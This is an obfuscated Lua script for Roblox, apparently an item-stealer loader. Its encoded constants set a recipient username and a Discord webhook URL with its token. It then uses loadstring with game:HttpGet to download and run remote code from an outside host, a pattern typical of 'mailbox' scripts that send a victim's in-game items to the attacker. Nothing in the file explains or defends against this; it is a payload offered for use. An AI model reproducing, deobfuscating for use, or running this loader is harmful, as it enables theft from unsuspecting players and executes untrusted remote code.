--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v70,v19);v19=nil;v97=1;end end else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -(878 -(282 + 595))))) + (620 -(555 + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;else local v72=568 -(367 + 201) ;local v73;while true do if (v72==0) then v73=(929 -(214 + (2350 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + ((974 -(892 + 65)) -13) ;return (v40 * ((40022842 -23245509) -(32 + 85))) + (v39 * (64226 + 1310)) + (v38 * ((104 -47) + (364 -165))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=351 -(87 + 263) ;local v44=(v20(v42,181 -(67 + 113) ,15 + 5 ) * (2^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,123 -92 );local v46=((v20(v42,984 -(802 + 150) )==(2 -1)) and  -(1 -0)) or 1 ;if (v45==((18 -(10 + 8)) + 0)) then if (v44==(997 -(915 + 82))) then return v46 * (0 -(0 -0)) ;else local v78=0 + (442 -(416 + 26)) ;while true do if (v78==(0 -0)) then v45=1188 -(1069 + 118) ;v43=0 -0 ;break;end end end elseif (v45==((14294 -9817) -2430)) then return ((v44==(0 + 0)) and (v46 * (((1 + 0) -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(((1402 -609) -((806 -(145 + 293)) + 423))^(163 -111)))) ;end local function v25(v47)local v48;if  not v47 then local v74=430 -(44 + 386) ;while true do if (v74==(1486 -(998 + 488))) then v47=v23();if (v47==0) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;local v49={};for v67=1 + (772 -(201 + 571)) , #v48 do v49[v67]=v2(v1(v3(v48,v67,v67)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=26 -(11 + 15) ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v50==(196 -(26 + 168))) then v55=nil;v56=nil;v50=3;end if (v50~=(3 -0)) then else v57=nil;v58=nil;v50=882 -(284 + 594) ;end if (v50==0) then v51=0 -0 ;v52=nil;v50=2 -1 ;end if (v50==(170 -(122 + 44))) then v59=nil;while true do if (v51==(6 -2)) then while true do if (v52==3) then v59=nil;while true do local v106=0 -0 ;local v107;while true do if (v106~=(0 + 0)) then else v107=0;while true do if (v107==(1 + 0)) then if (v53==(3 -1)) then local v168=0;local v169;local v170;while true do if (v168~=(65 -(30 + 35))) then else v169=0;v170=nil;v168=1;end if (v168==(1 + 0)) then while true do if (v169==(1257 -(1043 + 214))) then v170=0 -0 ;while true do local v175=1212 -(323 + 889) ;while true do if (v175~=0) then else if (v170==(0 -0)) then local v183=0;local v184;while true do if (v183~=0) then else v184=580 -(361 + 219) ;while true do if (0~=v184) then else local v193=320 -(53 + 267) ;while true do if (v193==(1 + 0)) then v184=1;break;end if (v193~=(413 -(15 + 398))) then else for v194=983 -(18 + 964) ,v23() do local v195=0 -0 ;local v196;local v197;local v198;while true do if (v195~=1) then else v198=nil;while true do if (v196==0) then local v202=0 + 0 ;while true do if (v202~=1) then else v196=1;break;end if (v202==0) then v197=0 + 0 ;v198=nil;v202=851 -(20 + 830) ;end end end if (v196==(1 + 0)) then while true do if ((126 -(116 + 10))==v197) then v198=v21();if (v20(v198,1,1 + 0 )==(738 -(542 + 196))) then local v203=0 -0 ;local v204;local v205;local v206;local v207;local v208;while true do if (v203~=(1 + 1)) then else v208=nil;while true do if (v204~=0) then else local v209=0;while true do if (v209==(0 + 0)) then v205=0;v206=nil;v209=1;end if (v209==(1 + 0)) then v204=2 -1 ;break;end end end if (v204==(4 -2)) then while true do if (v205~=2) then else local v211=1551 -(1126 + 425) ;local v212;while true do if (v211==(405 -(118 + 287))) then v212=0;while true do if ((0 -0)==v212) then if (v20(v207,1122 -(118 + 1003) ,1)==(2 -1)) then v208[379 -(142 + 235) ]=v59[v208[2]];end if (v20(v207,9 -7 ,2)~=(1 + 0)) then else v208[3]=v59[v208[3]];end v212=978 -(553 + 424) ;end if (v212==(1 -0)) then v205=3;break;end end break;end end end if (v205~=(1 + 0)) then else local v213=0;while true do if (v213~=(0 + 0)) then else local v219=0;while true do if (v219==(1 + 0)) then v213=1 + 0 ;break;end if (v219~=(0 + 0)) then else v208={v22(),v22(),nil,nil};if (v206==(0 -0)) then local v225=0;local v226;local v227;local v228;while true do if (v225==(0 -0)) then v226=0 -0 ;v227=nil;v225=1;end if (v225~=1) then else v228=nil;while true do if (v226==(0 + 0)) then v227=0;v228=nil;v226=4 -3 ;end if ((754 -(239 + 514))==v226) then while true do if (v227==(0 + 0)) then v228=0;while true do if (v228==(1329 -(797 + 532))) then v208[3 + 0 ]=v22();v208[2 + 2 ]=v22();break;end end break;end end break;end end break;end end elseif (v206==1) then v208[6 -3 ]=v23();elseif (v206==2) then v208[3]=v23() -(2^(1218 -(373 + 829))) ;elseif (v206==(734 -(476 + 255))) then local v232=0;local v233;local v234;local v235;while true do if (v232==0) then v233=1130 -(369 + 761) ;v234=nil;v232=1;end if ((1 + 0)~=v232) then else v235=nil;while true do if (v233==0) then v234=0;v235=nil;v233=1;end if (v233~=(1 -0)) then else while true do if (v234==(0 -0)) then v235=238 -(64 + 174) ;while true do if (v235==(0 + 0)) then v208[3 -0 ]=v23() -((338 -(144 + 192))^16) ;v208[220 -(42 + 174) ]=v22();break;end end break;end end break;end end break;end end end v219=1;end end end if ((1 + 0)==v213) then v205=2;break;end end end if (v205==(3 + 0)) then if (v20(v207,2 + 1 ,1507 -(363 + 1141) )~=(1581 -(1183 + 397))) then else v208[11 -7 ]=v59[v208[3 + 1 ]];end v54[v194]=v208;break;end if (v205==0) then local v215=0;local v216;while true do if (v215==0) then v216=0;while true do if (v216==(0 + 0)) then local v220=0;while true do if (0==v220) then local v229=1975 -(1913 + 62) ;while true do if (v229==(1 + 0)) then v220=1;break;end if (v229~=0) then else v206=v20(v198,2,7 -4 );v207=v20(v198,1937 -(565 + 1368) ,6);v229=1;end end end if (v220==(3 -2)) then v216=1662 -(1477 + 184) ;break;end end end if ((1 -0)==v216) then v205=1;break;end end break;end end end end break;end if (v204~=1) then else local v210=0 + 0 ;while true do if (0~=v210) then else v207=nil;v208=nil;v210=1;end if (v210==(857 -(564 + 292))) then v204=2;break;end end end end break;end if (v203==1) then v206=nil;v207=nil;v203=2 -0 ;end if (v203==0) then v204=0;v205=nil;v203=1;end end end break;end end break;end end break;end if (0==v195) then v196=0 -0 ;v197=nil;v195=305 -(244 + 60) ;end end end for v199=1 + 0 ,v23() do v55[v199-1 ]=v28();end v193=1;end end end if (v184==(477 -(41 + 435))) then v170=1;break;end end break;end end end if (1~=v170) then else return v57;end break;end end end break;end end break;end end end break;end if (v107==0) then local v144=0;while true do if (v144==(1002 -(938 + 63))) then v107=1;break;end if (v144~=(0 + 0)) then else if (v53==(1126 -(936 + 189))) then local v171=0 + 0 ;local v172;while true do if (v171==(1613 -(1565 + 48))) then v172=0 + 0 ;while true do if (v172==(1140 -(782 + 356))) then v53=269 -(176 + 91) ;break;end if (v172==0) then local v176=0 -0 ;local v177;while true do if ((0 -0)~=v176) then else v177=1092 -(975 + 117) ;while true do if (v177==(1876 -(157 + 1718))) then v172=1 + 0 ;break;end if (v177==0) then local v192=0;while true do if (v192==(0 -0)) then v58=v23();v59={};v192=3 -2 ;end if (v192==(1019 -(697 + 321))) then v177=1;break;end end end end break;end end end if (v172==1) then local v178=0 -0 ;while true do if (v178~=0) then else for v186=1 -0 ,v58 do local v187=0;local v188;local v189;local v190;local v191;while true do if (2~=v187) then else while true do if (v188==1) then v191=nil;while true do if (v189~=1) then else if (v190==(2 -1)) then v191=v21()~=(0 + 0) ;elseif (v190==(3 -1)) then v191=v24();elseif (v190==(7 -4)) then v191=v25();end v59[v186]=v191;break;end if (v189~=(1227 -(322 + 905))) then else v190=v21();v191=nil;v189=612 -(602 + 9) ;end end break;end if (v188~=(1189 -(449 + 740))) then else v189=872 -(826 + 46) ;v190=nil;v188=948 -(245 + 702) ;end end break;end if (v187~=1) then else v190=nil;v191=nil;v187=2;end if (v187~=(0 -0)) then else v188=0;v189=nil;v187=1;end end end v57[1 + 2 ]=v21();v178=1899 -(260 + 1638) ;end if (v178==(441 -(382 + 58))) then v172=6 -4 ;break;end end end end break;end end end if (v53==0) then local v173=0 + 0 ;local v174;while true do if (v173==0) then v174=0;while true do if (v174==0) then local v179=0 -0 ;local v180;while true do if (v179==(0 -0)) then v180=1205 -(902 + 303) ;while true do if (1~=v180) then else v174=1 -0 ;break;end if (v180~=0) then else v54={};v55={};v180=1;end end break;end end end if (v174==(4 -2)) then v53=1;break;end if (v174==1) then local v181=0 + 0 ;local v182;while true do if (v181==0) then v182=0;while true do if (0~=v182) then else v56={};v57={v54,v55,nil,v56};v182=215 -(22 + 192) ;end if (v182~=1) then else v174=685 -(483 + 200) ;break;end end break;end end end end break;end end end v144=1;end end end end break;end end end break;end if (v52==0) then local v103=0;while true do if (v103~=0) then else local v114=1463 -(1404 + 59) ;while true do if (v114~=(2 -1)) then else v103=1 -0 ;break;end if ((765 -(468 + 297))==v114) then v53=562 -(334 + 228) ;v54=nil;v114=3 -2 ;end end end if (v103==1) then v52=2 -1 ;break;end end end if (1==v52) then local v104=0;while true do if (v104==0) then v55=nil;v56=nil;v104=1;end if (v104~=1) then else v52=2 -0 ;break;end end end if (v52~=2) then else local v105=0 + 0 ;while true do if (v105~=0) then else v57=nil;v58=nil;v105=1;end if (v105==1) then v52=239 -(141 + 95) ;break;end end end end break;end if (v51==(0 + 0)) then v52=0;v53=nil;v51=1;end if (v51==(7 -4)) then v58=nil;v59=nil;v51=4;end if (2~=v51) then else local v96=0 -0 ;while true do if (v96~=(0 + 0)) then else v56=nil;v57=nil;v96=2 -1 ;end if (v96~=1) then else v51=3;break;end end end if (v51==(1 + 0)) then v54=nil;v55=nil;v51=2 + 0 ;end end break;end if (1==v50) then v53=nil;v54=nil;v50=2;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=6) then if (v92<=2) then if (v92<=0) then local v108=v91[2];v89[v108]=v89[v108](v13(v89,v108 + 1 ,v84));elseif (v92==1) then for v138=v91[2],v91[3] do v89[v138]=nil;end else v89[v91[2]]=v62[v91[3]];end elseif (v92<=4) then if (v92==3) then v89[v91[2]]=v91[3]~=0 ;else local v118=v91[2];local v119=v89[v91[3]];v89[v118 + 1 ]=v119;v89[v118]=v119[v91[4]];end elseif (v92==5) then v89[v91[2]]=v91[3];else v62[v91[3]]=v89[v91[2]];end elseif (v92<=9) then if (v92<=7) then v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];elseif (v92>8) then local v127=v91[2];local v128,v129=v82(v89[v127](v13(v89,v127 + 1 ,v91[3])));v84=(v129 + v127) -1 ;local v130=0;for v140=v127,v84 do v130=v130 + 1 ;v89[v140]=v128[v130];end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=11) then if (v92==10) then local v131=0;local v132;local v133;local v134;local v135;local v136;while true do if (v131==0) then v132=nil;v133,v134=nil;v135=nil;v136=nil;v131=1;end if (v131==4) then v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v136=v91[2];v131=5;end if (v131==8) then v91=v79[v83];v83=v91[3];break;end if (v131==5) then v133,v134=v82(v89[v136](v13(v89,v136 + 1 ,v91[3])));v84=(v134 + v136) -1 ;v132=0;for v165=v136,v84 do v132=v132 + 1 ;v89[v165]=v133[v132];end v131=6;end if (v131==7) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v131=8;end if (v131==1) then v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v136=v91[2];v131=2;end if (v131==2) then v135=v89[v91[3]];v89[v136 + 1 ]=v135;v89[v136]=v135[v91[4]];v83=v83 + 1 ;v131=3;end if (v131==3) then v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v131=4;end if (v131==6) then v83=v83 + 1 ;v91=v79[v83];v136=v91[2];v89[v136]=v89[v136](v13(v89,v136 + 1 ,v84));v131=7;end end else do return;end end elseif (v92==12) then v89[v91[2]]();else v83=v91[3];end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503103O00456E646572536861646F772O3037313203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133343732383930392O37353137353733302F5144755F3539786667734D6D5251303378485379635A636F68364B64714E50455576626E3056576E736C396D5F73423043326B387636716962766B6E50782O5250664774001B3O0012053O00014O0001000100013O0026083O00020001000100040D3O00020001001205000100013O002608000100100001000200040D3O00100001001202000200033O00120A000300043O00202O00030003000500122O000500066O000600016O000300066O00023O00024O00020001000100044O001A0001002608000100050001000100040D3O00050001001205000200083O001207000200073O00122O0002000A3O00122O000200093O00122O000100023O00044O0005000100040D3O001A000100040D3O000200012O000B3O00017O00",v9(),...);
